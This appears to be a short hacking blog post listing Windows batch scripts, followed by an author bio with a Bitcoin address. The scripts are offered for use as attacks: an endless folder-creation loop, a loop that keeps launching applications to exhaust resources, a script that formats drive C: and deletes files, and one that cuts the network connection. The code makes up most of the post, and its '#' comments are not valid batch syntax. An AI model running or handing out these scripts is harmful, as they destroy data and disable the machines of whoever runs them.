Batch to hack

Folder flooder

@echo off # It instructs to hide the commands when batch files is executed
:x # loop variable
md %random% # makes directory/folder.
goto x # infinite loop
Bash

Application Bomber

@echo off # It instructs to hide the commands when batch files is executed
:begin # loop variable
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto begin # infinite loop
Bash

Formater le disque dur

@echo off
ipconfig /release
format c:
format c: /Y
del c:\*.*
Bash

Disable Internet

@echo off
ipconfig /release
Bash

MarquandT

Ethical Hacker ~ Web Developper ~ File Hosting Provider ~ Crypto Enthusiast ~ Automation Expert Bitcoin donation: 32Uu4NKGnxSPC7UukYXVyRHwbppbQpKVki

1022